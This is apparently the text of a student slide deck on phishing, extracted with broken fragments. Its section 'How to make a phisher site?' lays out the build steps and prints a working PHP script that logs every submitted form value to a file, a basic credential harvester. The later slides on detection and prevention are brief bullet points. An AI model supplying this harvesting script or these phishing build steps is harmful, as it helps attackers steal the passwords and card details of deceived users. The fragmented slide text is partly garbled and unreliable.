Escolar Documentos
Profissional Documentos
Cultura Documentos
Guided By
M.Chandu Jagan Shekar BY
Asst Professor P.Srikanth
Dept of IT IT(07U41A1240)
Contents
Introduction
How to make a phisher site?
How to use a phisher site?
How the phishing happens/done?
Detecting phishing sites?
Preventing from phisher
Reporting phishing
Introduction
History:
Introduced in 1987, and the first use of the term
"phishing" was made in 1996.
Definition:
Process of attempting to acquire sensitive
information such as usernames, passwords and credit
card details.
How to make a phisher site?
Making a Phishing site contains 3 steps:
Redirecting.
Embedding Script(PHP).
Creating a login page:
Redirecting
Original site redirection Fake site redirection
Embedding Script(PHP)
<?phpheader("");
$handle = fopen("name.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;?>
How the phishing happens/done?
Instant messaging
While chatting with someone by using the
Messenger’s like yahoo,Gmail.etc.
Links to
fake
page of
corresp
onding
site
How The Phishing happens/done?
http://ww
Fake E-mails w.trusted-
bankin/lo
gin.html
Structure of phishing
1 7
5
6
2
3
4
Detecting & Preventing Phishing Sites
HTTP – HTTPS
Digital Signatures
Email notice
• HTTP-HTTPS
• HTTP-HTTPS
• Digital signatures…
• Wrong Password (Redirecting)
• Email notice